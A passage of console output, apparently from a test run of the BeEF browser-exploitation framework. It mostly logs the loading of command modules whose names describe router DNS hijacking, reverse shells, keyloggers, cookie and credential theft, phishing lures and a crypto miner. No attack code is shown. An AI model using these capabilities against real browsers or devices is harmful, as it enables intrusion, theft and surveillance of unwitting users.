'bt_home_hub_csrf' +[12:25:37][>] Server: mounted handler '/command/linksys_e2500_shell.js' +[12:25:37][>] Hard Load module: 'linksys_e2500_shell' +[12:25:37][>] Server: mounted handler '/command/beetel_bcm96338_router_dns_hijack.js' +[12:25:37][>] Hard Load module: 'beetel_bcm96338_router_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/Netgear_dgn_2000_wan_mgmt_csrf.js' +[12:25:37][>] Hard Load module: 'Netgear_dgn_2000_wan_mgmt_csrf' +[12:25:37][>] Server: mounted handler '/command/netgear_dgn2200_cmd_exec.js' +[12:25:37][>] Hard Load module: 'netgear_dgn2200_cmd_exec' +[12:25:37][>] Server: mounted handler '/command/tplink_dns_csrf.js' +[12:25:37][>] Hard Load module: 'tplink_dns_csrf' +[12:25:37][>] Server: mounted handler '/command/asus_rt_n66u_cmd_exec.js' +[12:25:37][>] Hard Load module: 'asus_rt_n66u_cmd_exec' +[12:25:37][>] Server: mounted handler '/command/ddwrt_v24_sp1_csrf.js' +[12:25:37][>] Hard Load module: 'ddwrt_v24_sp1_csrf' +[12:25:37][>] Server: mounted handler '/command/linksys_wrt54g2_csrf.js' +[12:25:37][>] Hard Load module: 'linksys_wrt54g2_csrf' +[12:25:37][>] Server: mounted handler '/command/telstra_zte_mf91_change_ssid.js' +[12:25:37][>] Hard Load module: 'telstra_zte_mf91_change_ssid' +[12:25:37][>] Server: mounted handler '/command/telstra_zte_mf91_change_pw.js' +[12:25:37][>] Hard Load module: 'telstra_zte_mf91_change_pw' +[12:25:37][>] Server: mounted handler '/command/asus_rt_n12e_get_info.js' +[12:25:37][>] Hard Load module: 'asus_rt_n12e_get_info' +[12:25:37][>] Server: mounted handler '/command/linksys_wrt54g_csrf.js' +[12:25:37][>] Hard Load module: 'linksys_wrt54g_csrf' +[12:25:37][>] Server: mounted handler '/command/tenda_adsl_dns_hijack.js' +[12:25:37][>] Hard Load module: 'tenda_adsl_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/belkin_dns_csrf.js' +[12:25:37][>] Hard Load module: 'belkin_dns_csrf' +[12:25:37][>] Server: mounted handler '/command/comtrend_ct5624_csrf.js' +[12:25:37][>] Hard Load module: 'comtrend_ct5624_csrf' +[12:25:37][>] Server: mounted handler '/command/dlink_dsl2640u_dns_hijack.js' +[12:25:37][>] Hard Load module: 'dlink_dsl2640u_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/freenas_reverse_root_shell_csrf.js' +[12:25:37][>] Hard Load module: 'freenas_reverse_root_shell_csrf' +[12:25:37][>] Server: mounted handler '/command/dlink_sharecenter_cmd_exec.js' +[12:25:37][>] Hard Load module: 'dlink_sharecenter_cmd_exec' +[12:25:37][>] Server: mounted handler '/command/boastmachine_add_user_csrf.js' +[12:25:37][>] Hard Load module: 'boastmachine_add_user_csrf' +[12:25:37][>] Server: mounted handler '/command/zenoss_add_user_csrf.js' +[12:25:37][>] Hard Load module: 'zenoss_add_user_csrf' +[12:25:37][>] Server: mounted handler '/command/hp_ucmdb_add_user_csrf.js' +[12:25:37][>] Hard Load module: 'hp_ucmdb_add_user_csrf' +[12:25:37][>] Server: mounted handler '/command/glassfish_war_upload_xsrf.js' +[12:25:37][>] Hard Load module: 'glassfish_war_upload_xsrf' +[12:25:37][>] Server: mounted handler '/command/ntfscommoncreate_dos.js' +[12:25:37][>] Hard Load module: 'ntfscommoncreate_dos' +[12:25:37][>] Server: mounted handler '/command/shell_shock_scanner.js' +[12:25:37][>] Hard Load module: 'shell_shock_scanner' +[12:25:37][>] Server: mounted handler '/command/Wordpress_add_admin.js' +[12:25:37][>] Hard Load module: 'Wordpress_add_admin' +[12:25:37][>] Server: mounted handler '/command/apache_cookies.js' +[12:25:37][>] Hard Load module: 'apache_cookies' +[12:25:37][>] Server: mounted handler '/command/airlive_add_user_csrf.js' +[12:25:37][>] Hard Load module: 'airlive_add_user_csrf' +[12:25:37][>] Server: mounted handler '/command/linksys_wvc_wireless_camera_csrf.js' +[12:25:37][>] Hard Load module: 'linksys_wvc_wireless_camera_csrf' +[12:25:37][>] Server: mounted handler '/command/Dlink_dcs_series_csrf.js' +[12:25:37][>] Hard Load module: 'Dlink_dcs_series_csrf' +[12:25:37][>] Server: mounted handler '/command/firephp_code_exec.js' +[12:25:37][>] Hard Load module: 'firephp_code_exec' +[12:25:37][>] Server: mounted handler '/command/Shell_shocked.js' +[12:25:37][>] Hard Load module: 'Shell_shocked' +[12:25:37][>] Server: mounted handler '/command/Netgear_gs108t_csrf.js' +[12:25:37][>] Hard Load module: 'Netgear_gs108t_csrf' +[12:25:37][>] Server: mounted handler '/command/Dlink_dgs_1100_device_reset_csrf.js' +[12:25:37][>] Hard Load module: 'Dlink_dgs_1100_device_reset_csrf' +[12:25:37][>] Server: mounted handler '/command/Dlink_dgs_1100_fdb_whitelist_csrf.js' +[12:25:37][>] Hard Load module: 'Dlink_dgs_1100_fdb_whitelist_csrf' +[12:25:37][>] Server: mounted handler '/command/Dlink_dgs_1100_port_mirroring_csrf.js' +[12:25:37][>] Hard Load module: 'Dlink_dgs_1100_port_mirroring_csrf' +[12:25:37][>] Server: mounted handler '/command/groovyshell_server_command_execution.js' +[12:25:37][>] Hard Load module: 'groovyshell_server_command_execution' +[12:25:37][>] Server: mounted handler '/command/jboss_jmx_upload_exploit.js' +[12:25:37][>] Hard Load module: 'jboss_jmx_upload_exploit' +[12:25:37][>] Server: mounted handler '/command/skype_xss.js' +[12:25:37][>] Hard Load module: 'skype_xss' +[12:25:37][>] Server: mounted handler '/command/serendipity_1_6_xss.js' +[12:25:37][>] Hard Load module: 'serendipity_1_6_xss' +[12:25:37][>] Server: mounted handler '/command/sqlitemanager_xss.js' +[12:25:37][>] Hard Load module: 'sqlitemanager_xss' +[12:25:37][>] Server: mounted handler '/command/cisco_collaboration_server_5_xss.js' +[12:25:37][>] Hard Load module: 'cisco_collaboration_server_5_xss' +[12:25:37][>] Server: mounted handler '/command/alienvault_ossim_3_1_xss.js' +[12:25:37][>] Hard Load module: 'alienvault_ossim_3_1_xss' +[12:25:37][>] Server: mounted handler '/command/extract_cmd_exec.js' +[12:25:37][>] Hard Load module: 'extract_cmd_exec' +[12:25:37][>] Server: mounted handler '/command/monowall_reverse_root_shell_csrf.js' +[12:25:37][>] Hard Load module: 'monowall_reverse_root_shell_csrf' +[12:25:37][>] Server: mounted handler '/command/BeEF_bind_shell.js' +[12:25:37][>] Hard Load module: 'BeEF_bind_shell' +[12:25:37][>] Server: mounted handler '/command/Eudora_mail_beef_bind.js' +[12:25:37][>] Hard Load module: 'Eudora_mail_beef_bind' +[12:25:37][>] Server: mounted handler '/command/Active_fax_beef_bind.js' +[12:25:37][>] Hard Load module: 'Active_fax_beef_bind' +[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_admin_password.js' +[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_admin_password' +[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass.js' +[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass' +[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_migrate_hook.js' +[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_migrate_hook' +[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_file_disclosure.js' +[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_file_disclosure' +[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_admin_static_token.js' +[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_admin_static_token' +[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_scanner.js' +[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_scanner' +[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_admin_dynamic_token.js' +[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_admin_dynamic_token' +[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_reverse_shell_csrf_sop.js' +[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_reverse_shell_csrf_sop' +[12:25:37][>] Server: mounted handler '/command/jenkins_groovy_code_exec.js' +[12:25:37][>] Hard Load module: 'jenkins_groovy_code_exec' +[12:25:37][>] Server: mounted handler '/command/zenoss_command_execution.js' +[12:25:37][>] Hard Load module: 'zenoss_command_execution' +[12:25:37][>] Server: mounted handler '/command/activex_command_execution.js' +[12:25:37][>] Hard Load module: 'activex_command_execution' +[12:25:37][>] Server: mounted handler '/command/ie_ms12_004_midi.js' +[12:25:37][>] Hard Load module: 'ie_ms12_004_midi' +[12:25:37][>] Server: mounted handler '/command/windows_mail_client_dos.js' +[12:25:37][>] Hard Load module: 'windows_mail_client_dos' +[12:25:37][>] Server: mounted handler '/command/java_payload.js' +[12:25:37][>] Hard Load module: 'java_payload' +[12:25:37][>] Server: mounted handler '/command/signed_applet_dropper.js' +[12:25:37][>] Hard Load module: 'signed_applet_dropper' +[12:25:37][>] Server: mounted handler '/command/ie_ms13_069_caret.js' +[12:25:37][>] Hard Load module: 'ie_ms13_069_caret' +[12:25:37][>] Server: mounted handler '/command/safari_launch_app.js' +[12:25:37][>] Hard Load module: 'safari_launch_app' +[12:25:37][>] Server: mounted handler '/command/ruby_nntpd_cmd_exec.js' +[12:25:37][>] Hard Load module: 'ruby_nntpd_cmd_exec' +[12:25:37][>] Server: mounted handler '/command/farsite_X25_remote_shell.js' +[12:25:37][>] Hard Load module: 'farsite_X25_remote_shell' +[12:25:37][>] Server: mounted handler '/command/php_dos.js' +[12:25:37][>] Hard Load module: 'php_dos' +[12:25:37][>] Server: mounted handler '/command/rfi_scanner.js' +[12:25:37][>] Hard Load module: 'rfi_scanner' +[12:25:37][>] Server: mounted handler '/command/resource_exhaustion_dos.js' +[12:25:37][>] Hard Load module: 'resource_exhaustion_dos' +[12:25:37][>] Server: mounted handler '/command/phonegap_check_connection.js' +[12:25:37][>] Hard Load module: 'phonegap_check_connection' +[12:25:37][>] Server: mounted handler '/command/phonegap_list_files.js' +[12:25:37][>] Hard Load module: 'phonegap_list_files' +[12:25:37][>] Server: mounted handler '/command/phonegap_start_record_audio.js' +[12:25:37][>] Hard Load module: 'phonegap_start_record_audio' +[12:25:37][>] Server: mounted handler '/command/phonegap_file_upload.js' +[12:25:37][>] Hard Load module: 'phonegap_file_upload' +[12:25:37][>] Server: mounted handler '/command/phonegap_prompt_user.js' +[12:25:37][>] Hard Load module: 'phonegap_prompt_user' +[12:25:37][>] Server: mounted handler '/command/phonegap_persist_resume.js' +[12:25:37][>] Hard Load module: 'phonegap_persist_resume' +[12:25:37][>] Server: mounted handler '/command/phonegap_globalization_status.js' +[12:25:37][>] Hard Load module: 'phonegap_globalization_status' +[12:25:37][>] Server: mounted handler '/command/phonegap_keychain.js' +[12:25:37][>] Hard Load module: 'phonegap_keychain' +[12:25:37][>] Server: mounted handler '/command/phonegap_list_contacts.js' +[12:25:37][>] Hard Load module: 'phonegap_list_contacts' +[12:25:37][>] Server: mounted handler '/command/phonegap_persistence.js' +[12:25:37][>] Hard Load module: 'phonegap_persistence' +[12:25:37][>] Server: mounted handler '/command/phonegap_alert_user.js' +[12:25:37][>] Hard Load module: 'phonegap_alert_user' +[12:25:37][>] Server: mounted handler '/command/phonegap_geo_locate.js' +[12:25:37][>] Hard Load module: 'phonegap_geo_locate' +[12:25:37][>] Server: mounted handler '/command/phonegap_plugin_detection.js' +[12:25:37][>] Hard Load module: 'phonegap_plugin_detection' +[12:25:37][>] Server: mounted handler '/command/phonegap_detect.js' +[12:25:37][>] Hard Load module: 'phonegap_detect' +[12:25:37][>] Server: mounted handler '/command/phonegap_stop_record_audio.js' +[12:25:37][>] Hard Load module: 'phonegap_stop_record_audio' +[12:25:37][>] Server: mounted handler '/command/phonegap_beep.js' +[12:25:37][>] Hard Load module: 'phonegap_beep' +[12:25:37][>] Server: mounted handler '/command/steal_autocomplete.js' +[12:25:37][>] Hard Load module: 'steal_autocomplete' +[12:25:37][>] Server: mounted handler '/command/text_to_voice.js' +[12:25:37][>] Hard Load module: 'text_to_voice' +[12:25:37][>] Server: mounted handler '/command/pretty_theft.js' +[12:25:37][>] Hard Load module: 'pretty_theft' +[12:25:37][>] Server: mounted handler '/command/gmail_phishing.js' +[12:25:37][>] Hard Load module: 'gmail_phishing' +[12:25:37][>] Server: mounted handler '/command/ui_abuse_ie.js' +[12:25:37][>] Hard Load module: 'ui_abuse_ie' +[12:25:37][>] Server: mounted handler '/command/fake_lastpass.js' +[12:25:37][>] Hard Load module: 'fake_lastpass' +[12:25:37][>] Server: mounted handler '/command/tabnabbing.js' +[12:25:37][>] Hard Load module: 'tabnabbing' +[12:25:37][>] Server: mounted handler '/command/sitekiosk_breakout.js' +[12:25:37][>] Hard Load module: 'sitekiosk_breakout' +[12:25:37][>] Server: mounted handler '/command/fake_notification_ie.js' +[12:25:37][>] Hard Load module: 'fake_notification_ie' +[12:25:37][>] Server: mounted handler '/command/replace_video_fake_plugin.js' +[12:25:37][>] Hard Load module: 'replace_video_fake_plugin' +[12:25:37][>] Server: mounted handler '/command/fake_notification.js' +[12:25:37][>] Hard Load module: 'fake_notification' +[12:25:37][>] Server: mounted handler '/command/clippy.js' +[12:25:37][>] Hard Load module: 'clippy' +[12:25:37][>] Server: mounted handler '/command/fake_evernote_clipper.js' +[12:25:37][>] Hard Load module: 'fake_evernote_clipper' +[12:25:37][>] Server: mounted handler '/command/firefox_extension_reverse_shell.js' +[12:25:37][>] Hard Load module: 'firefox_extension_reverse_shell' +[12:25:37][>] Server: mounted handler '/command/simple_hijacker.js' +[12:25:37][>] Hard Load module: 'simple_hijacker' +[12:25:37][>] Server: mounted handler '/command/hta_powershell.js' +[12:25:37][>] Hard Load module: 'hta_powershell' +[12:25:37][>] Server: mounted handler '/command/clickjacking.js' +[12:25:37][>] Hard Load module: 'clickjacking' +[12:25:37][>] Server: mounted handler '/command/spoof_addressbar_data.js' +[12:25:37][>] Hard Load module: 'spoof_addressbar_data' +[12:25:37][>] Server: mounted handler '/command/fake_notification_c.js' +[12:25:37][>] Hard Load module: 'fake_notification_c' +[12:25:37][>] Server: mounted handler '/command/lcamtuf_download.js' +[12:25:37][>] Hard Load module: 'lcamtuf_download' +[12:25:37][>] Server: mounted handler '/command/edge_wscript_wsh_injection.js' +[12:25:37][>] Hard Load module: 'edge_wscript_wsh_injection' +[12:25:37][>] Server: mounted handler '/command/firefox_extension_dropper.js' +[12:25:37][>] Hard Load module: 'firefox_extension_dropper' +[12:25:37][>] Server: mounted handler '/command/firefox_extension_bindshell.js' +[12:25:37][>] Hard Load module: 'firefox_extension_bindshell' +[12:25:37][>] Server: mounted handler '/command/fake_notification_ff.js' +[12:25:37][>] Hard Load module: 'fake_notification_ff' +[12:25:37][>] Server: mounted handler '/command/fake_flash_update.js' +[12:25:37][>] Hard Load module: 'fake_flash_update' +[12:25:37][>] Server: mounted handler '/command/cross_site_printing.js' +[12:25:37][>] Hard Load module: 'cross_site_printing' +[12:25:37][>] Server: mounted handler '/command/cross_site_faxing.js' +[12:25:37][>] Hard Load module: 'cross_site_faxing' +[12:25:37][>] Server: mounted handler '/command/inter_protocol_win_bindshell.js' +[12:25:37][>] Hard Load module: 'inter_protocol_win_bindshell' +[12:25:37][>] Server: mounted handler '/command/etag_client.js' +[12:25:37][>] Hard Load module: 'etag_client' +[12:25:37][>] Server: mounted handler '/command/s2c_dns_tunnel.js' +[12:25:37][>] Hard Load module: 's2c_dns_tunnel' +[12:25:37][>] Server: mounted handler '/command/inter_protocol_imap.js' +[12:25:37][>] Hard Load module: 'inter_protocol_imap' +[12:25:37][>] Server: mounted handler '/command/inter_protocol_redis.js' +[12:25:37][>] Hard Load module: 'inter_protocol_redis' +[12:25:37][>] Server: mounted handler '/command/inter_protocol_posix_bindshell.js' +[12:25:37][>] Hard Load module: 'inter_protocol_posix_bindshell' +[12:25:37][>] Server: mounted handler '/command/inter_protocol_irc.js' +[12:25:37][>] Hard Load module: 'inter_protocol_irc' +[12:25:37][>] Server: mounted handler '/command/send_inotes.js' +[12:25:37][>] Hard Load module: 'send_inotes' +[12:25:37][>] Server: mounted handler '/command/extract_inotes_list.js' +[12:25:37][>] Hard Load module: 'extract_inotes_list' +[12:25:37][>] Server: mounted handler '/command/send_inotes_with_attachment.js' +[12:25:37][>] Hard Load module: 'send_inotes_with_attachment' +[12:25:37][>] Server: mounted handler '/command/read_inotes.js' +[12:25:37][>] Hard Load module: 'read_inotes' +[12:25:37][>] Server: mounted handler '/command/inotes_flooder.js' +[12:25:37][>] Hard Load module: 'inotes_flooder' +[12:25:37][>] Server: mounted handler '/command/read_gmail.js' +[12:25:37][>] Hard Load module: 'read_gmail' +[12:25:37][>] Server: mounted handler '/command/invisible_iframe.js' +[12:25:37][>] Hard Load module: 'invisible_iframe' +[12:25:37][>] Server: mounted handler '/command/local_file_theft.js' +[12:25:37][>] Hard Load module: 'local_file_theft' +[12:25:37][>] Server: mounted handler '/command/iframe_keylogger.js' +[12:25:37][>] Hard Load module: 'iframe_keylogger' +[12:25:37][>] Server: mounted handler '/command/wordpress_current_user_info.js' +[12:25:37][>] Hard Load module: 'wordpress_current_user_info' +[12:25:37][>] Server: mounted handler '/command/wordpress_add_user.js' +[12:25:37][>] Hard Load module: 'wordpress_add_user' +[12:25:37][>] Server: mounted handler '/command/wordpress_upload_rce_plugin.js' +[12:25:37][>] Hard Load module: 'wordpress_upload_rce_plugin' +[12:25:37][>] Server: mounted handler '/command/wordpress_post_auth_rce.js' +[12:25:37][>] Hard Load module: 'wordpress_post_auth_rce' +[12:25:37][>] Server: mounted handler '/command/unblockui.js' +[12:25:37][>] Hard Load module: 'unblockui' +[12:25:37][>] Server: mounted handler '/command/iframe_sniffer.js' +[12:25:37][>] Hard Load module: 'iframe_sniffer' +[12:25:37][>] Server: mounted handler '/command/raw_javascript.js' +[12:25:37][>] Hard Load module: 'raw_javascript' +[12:25:37][>] Server: mounted handler '/command/blockui.js' +[12:25:37][>] Hard Load module: 'blockui' +[12:25:37][>] Server: mounted handler '/command/no_sleep.js' +[12:25:37][>] Hard Load module: 'no_sleep' +[12:25:37][>] Server: mounted handler '/command/cryptoloot_miner.js' +[12:25:37][>] Hard Load module: 'cryptoloot_miner' +[12:25:37][>] Server: mounted handler '/command/track_physical_movement.js' +[12:25:37][>] Hard Load module: 'track_physical_movement' +[12:25:37][>] Server: mounted handler '/command/detect_airdroid.js' +[12:25:37][>] Hard Load module: 'detect_airdroid' +[12:25:37][>] Server: mounted handler '/command/get_registry_keys.js' +[12:25:37][>] Hard Load module: 'get_registry_keys' +[12:25:37][>] Server: mounted handler '/command/iphone_tel.js' +[12:25:37][>] Hard Load module: 'iphone_tel' +[12:25:37][>] Server: mounted handler '/command/detect_protocol_handlers.js' +[12:25:37][>] Hard Load module: 'detect_protocol_handlers' +[12:25:37][>] Server: mounted handler '/command/physical_location_thirdparty.js' +[12:25:37][>] Hard Load module: 'physical_location_thirdparty' +[12:25:37][>] Server: mounted handler '/command/detect_coupon_printer.js' +[12:25:37][>] Hard Load module: 'detect_coupon_printer' +[12:25:37][>] Server: mounted handler '/command/hook_microsoft_edge.js' +[12:25:37][>] Hard Load module: 'hook_microsoft_edge' +[12:25:37][>] Server: mounted handler '/command/detect_hp.js' +[12:25:37][>] Hard Load module: 'detect_hp' +[12:25:37][>] Server: mounted handler '/command/detect_local_drives.js' +[12:25:37][>] Hard Load module: 'detect_local_drives' +[12:25:37][>] Server: mounted handler '/command/get_battery_status.js' +[12:25:37][>] Hard Load module: 'get_battery_status' +[12:25:37][>] Server: mounted handler '/command/detect_cups.js' +[12:25:37][>] Hard Load module: 'detect_cups' +[12:25:37][>] Server: mounted handler '/command/get_system_info_java.js' +[12:25:37][>] Hard Load module: 'get_system_info_java' +[12:25:37][>] Server: mounted handler '/command/get_internal_ip_java.js' +[12:25:37][>] Hard Load module: 'get_internal_ip_java' +[12:25:37][>] Server: mounted handler '/command/detect_antivirus.js' +[12:25:37][>] Hard Load module: 'detect_antivirus' +[12:25:37][>] Server: mounted handler '/command/clipboard_theft.js' +[12:25:37][>] Hard Load module: 'clipboard_theft' +[12:25:37][>] Server: mounted handler '/command/physical_location.js' +[12:25:37][>] Hard Load module: 'physical_location' +[12:25:37][>] Server: mounted handler '/command/detect_google_desktop.js' +[12:25:37][>] Hard Load module: 'detect_google_desktop' +[12:25:37][>] Server: mounted handler '/command/detect_default_browser.js' +[12:25:37][>] Hard Load module: 'detect_default_browser' +[12:25:37][>] Server: mounted handler '/command/get_internal_ip_webrtc.js' +[12:25:37][>] Hard Load module: 'get_internal_ip_webrtc' +[12:25:37][>] Server: mounted handler '/command/get_connection_type.js' +[12:25:37][>] Hard Load module: 'get_connection_type' +[12:25:37][>] Server: mounted handler '/command/detect_users.js' +[12:25:37][>] Hard Load module: 'detect_users' +[12:25:37][>] Server: mounted handler '/command/detect_software.js' +[12:25:37][>] Hard Load module: 'detect_software' +[12:25:37][>] Server: mounted handler '/command/get_wireless_keys.js' +[12:25:37][>] Hard Load module: 'get_wireless_keys' +[12:25:37][>] Server: mounted handler '/command/hook_default_browser.js' +[12:25:37][>] Hard Load module: 'hook_default_browser' +[12:25:37][>] Server: mounted handler '/command/popunder_window.js' +[12:25:37][>] Hard Load module: 'popunder_window' +[12:25:37][>] Server: mounted handler '/command/popunder_window_ie.js' +[12:25:37][>] Hard Load module: 'popunder_window_ie' +[12:25:37][>] Server: mounted handler '/command/iframe_above.js' +[12:25:37][>] Hard Load module: 'iframe_above' +[12:25:37][>] Server: mounted handler '/command/hijack_opener.js' +[12:25:37][>] Hard Load module: 'hijack_opener' +[12:25:37][>] Server: mounted handler '/command/invisible_htmlfile_activex.js' +[12:25:37][>] Hard Load module: 'invisible_htmlfile_activex' +[12:25:37][>] Server: mounted handler '/command/confirm_close_tab.js' +[12:25:37][>] Hard Load module: 'confirm_close_tab' +[12:25:37][>] Server: mounted handler '/command/man_in_the_browser.js' +[12:25:37][>] Hard Load module: 'man_in_the_browser' +[12:25:37][>] Server: mounted handler '/command/jsonp_service_worker.js' +[12:25:37][>] Hard Load module: 'jsonp_service_worker' +[12:25:37][>] Server: mounted handler '/command/send_gvoice_sms.js' +[12:25:37][>] Hard Load module: 'send_gvoice_sms' +[12:25:37][>] Server: mounted handler '/command/get_all_cookies.js' +[12:25:37][>] Hard Load module: 'get_all_cookies' +[12:25:37][>] Server: mounted handler '/command/execute_tabs.js' +[12:25:37][>] Hard Load module: 'execute_tabs' +[12:25:37][>] Server: mounted handler '/command/grab_google_contacts.js' +[12:25:37][>] Hard Load module: 'grab_google_contacts' +[12:25:37][>] Server: mounted handler '/command/inject_beef.js' +[12:25:37][>] Hard Load module: 'inject_beef' +[12:25:37][>] Server: mounted handler '/command/screenshot.js' +[12:25:37][>] Hard Load module: 'screenshot' + loaded successfully + +BeEF Security Checks + dangerous eval usage + +BeEF Extension Requester + requester works (PENDING: Temporarily skipped with xit) + loads configuration + has interface + +BeEF Extension IPEC + interface + loads configuration + +BeEF Dynamic Reconsturction + delete + put + head + get +[12:25:38][>] Network stack could not decode packet stream. +[12:25:38][>] Dumping Stream Data [base64]: 1 +[12:25:38][>] Dumping Stream Data: + one values +[12:25:38][!] Hooked browser returned an invalid argument: can't convert Array into Integer + array values + zero values + no params + negative one values +[12:25:38][!] Hooked browser returned an invalid argument: invalid value for Integer(): "z" + ascii values + +BeEF Extension Proxy + loads configuration + +BeEF Debug Command Modules: +[12:25:38][>] Loaded extension: 'network' +[12:25:38][>] Loaded extension: 'social_engineering' +[12:25:38][>] Loaded extension: 'admin_ui' +[12:25:38][>] Loaded extension: 'events' +[12:25:39][>] Loaded extension: 'requester' +[12:25:39][>] Loaded extension: 'proxy' +[12:25:39][>] Loaded extension: 'xssrays' +[12:25:39][>] Loaded extension: 'demos' +[12:25:44][!] Unable to load module 'internal_network_fingerprinting' +[12:25:44][!] Unable to load module 'detect_burp' +[12:25:44][!] Unable to load module 'get_http_servers' +[12:25:44][!] Unable to load module 'detect_tor' +[12:25:44][!] Unable to load module 'irc_nat_pinning' +[12:25:44][!] Unable to load module 'get_ntop_network_hosts' +[12:25:44][!] Unable to load module 'doser' +[12:25:44][!] Unable to load module 'detect_soc_nets' +[12:25:44][!] Unable to load module 'ping_sweep_ff' +[12:25:44][!] Unable to load module 'cross_origin_scanner_cors' +[12:25:44][!] Unable to load module 'dns_enumeration' +[12:25:44][!] Unable to load module 'cross_origin_scanner_flash' +[12:25:44][!] Unable to load module 'get_proxy_servers_wpad' +[12:25:44][!] Unable to load module 'port_scanner' +[12:25:44][!] Unable to load module 'fingerprint_routers' +[12:25:44][!] Unable to load module 'ping_sweep' +[12:25:44][!] Unable to load module 'f5_bigip_cookie_stealing' +[12:25:44][!] Unable to load module 'f5_bigip_cookie_disclosure' +[12:25:44][!] Unable to load module 'sw_port_scanner' +[12:25:44][!] Unable to load module 'ping_sweep_java' +[12:25:44][!] Unable to load module 'identify_lan_subnets' +[12:25:44][!] Unable to load module 'dns_rebinding' +[12:25:44][!] Unable to load module 'test_return_image' +[12:25:44][!] Unable to load module 'test_network_request' +[12:25:44][!] Unable to load module 'test_http_redirect' +[12:25:44][!] Unable to load module 'test_return_ascii_chars' +[12:25:44][!] Unable to load module 'test_dns_tunnel_client' +[12:25:44][!] Unable to load module 'test_beef_debug' +[12:25:44][!] Unable to load module 'test_get_variable' +[12:25:44][!] Unable to load module 'test_return_long_string' +[12:25:44][!] Unable to load module 'test_cors_request' +[12:25:44][!] Unable to load module 'Detect_unity' +[12:25:44][!] Unable to load module 'detect_office' +[12:25:44][!] Unable to load module 'unhook' +[12:25:44][!] Unable to load module 'avant_steal_history' +[12:25:44][!] Unable to load module 'detect_wmp' +[12:25:44][!] Unable to load module 'detect_vlc' +[12:25:44][!] Unable to load module 'browser_fingerprinting' +[12:25:44][!] Unable to load module 'webcam' +[12:25:44][!] Unable to load module 'get_visited_domains' +[12:25:44][!] Unable to load module 'detect_foxit' +[12:25:44][!] Unable to load module 'Detect_toolbars' +[12:25:44][!] Unable to load module 'detect_realplayer' +[12:25:44][!] Unable to load module 'detect_quicktime' +[12:25:44][!] Unable to load module 'get_visited_urls' +[12:25:44][!] Unable to load module 'fingerprint_browser' +[12:25:44][!] Unable to load module 'remove_hook_element' +[12:25:44][!] Unable to load module 'detect_lastpass' +[12:25:44][!] Unable to load module 'detect_simple_adblock' +[12:25:44][!] Unable to load module 'webcam_html5' +[12:25:44][!] Unable to load module 'get_page_html_iframe' +[12:25:44][!] Unable to load module 'link_rewrite_sslstrip' +[12:25:44][!] Unable to load module 'rickroll' +[12:25:44][!] Unable to load module 'link_rewrite_click_events' +[12:25:44][!] Unable to load module 'prompt_dialog' +[12:25:44][!] Unable to load module 'get_form_values' +[12:25:44][!] Unable to load module 'ajax_fingerprint' +[12:25:44][!] Unable to load module 'deface_web_page_component' +[12:25:44][!] Unable to load module 'mobilesafari_address_spoofing' +[12:25:44][!] Unable to load module 'deface_web_page' +[12:25:44][!] Unable to load module 'link_rewrite' +[12:25:44][!] Unable to load module 'get_stored_credentials' +[12:25:44][!] Unable to load module 'link_rewrite_tel' +[12:25:44][!] Unable to load module 'remove_stuck_iframes' +[12:25:44][!] Unable to load module 'get_cookie' +[12:25:44][!] Unable to load module 'clear_console' +[12:25:44][!] Unable to load module 'alert_dialog' +[12:25:44][!] Unable to load module 'site_redirect' +[12:25:44][!] Unable to load module 'site_redirect_iframe' +[12:25:44][!] Unable to load module 'get_local_storage' +[12:25:44][!] Unable to load module 'replace_video' +[12:25:44][!] Unable to load module 'overflow_cookiejar' +[12:25:44][!] Unable to load module 'get_page_html' +[12:25:44][!] Unable to load module 'get_page_links' +[12:25:44][!] Unable to load module 'get_session_storage' +[12:25:44][!] Unable to load module 'disable_developer_tools' +[12:25:44][!] Unable to load module 'detect_silverlight' +[12:25:44][!] Unable to load module 'detect_mime_types' +[12:25:44][!] Unable to load module 'webcam_permission_check' +[12:25:44][!] Unable to load module 'detect_extensions' +[12:25:44][!] Unable to load module 'detect_unsafe_activex' +[12:25:44][!] Unable to load module 'detect_activex' +[12:25:44][!] Unable to load module 'spyder_eye' +[12:25:44][!] Unable to load module 'Play_sound' +[12:25:44][!] Unable to load module 'detect_popup_blocker' +[12:25:44][!] Unable to load module 'detect_evernote_clipper' +[12:25:44][!] Unable to load module 'detect_firebug' +[12:25:44][!] Unable to load module 'vtiger_crm_upload_exploit' +[12:25:44][!] Unable to load module 'coldfusion_dir_traversal_exploit' +[12:25:44][!] Unable to load module 'pfsense_2_3_2_reverse_root_shell_csrf' +[12:25:44][!] Unable to load module 'pfsense_reverse_root_shell_csrf' +[12:25:44][!] Unable to load module 'qnx_qconn_command_execution' +[12:25:44][!] Unable to load module 'wanem_command_execution' +[12:25:44][!] Unable to load module 'kemp_command_execution' +[12:25:44][!] Unable to load module 'apache_felix_remote_shell' +[12:25:44][!] Unable to load module 'opencart_reset_password' +[12:25:44][!] Unable to load module 'spring_framework_malicious_jar' +[12:25:44][!] Unable to load module 'wipg1000_cmd_injection' +[12:25:44][!] Unable to load module 'planet_vdr300nu_adsl_dns_hijack' +[12:25:44][!] Unable to load module 'utstarcom_wa3002g4_dns_hijack' +[12:25:44][!] Unable to load module 'linksys_befsr41_csrf' +[12:25:44][!] Unable to load module 'Huawei_smartax_mt880_csrf' +[12:25:44][!] Unable to load module 'dlink_dsl2740r_dns_hijack' +[12:25:44][!] Unable to load module 'telstra_zte_mf91_disable_ap_isolation' +[12:25:44][!] Unable to load module 'dlink_dir_615_csrf' +[12:25:44][!] Unable to load module 'exper_ewm01_adsl_dns_hijack' +[12:25:44][!] 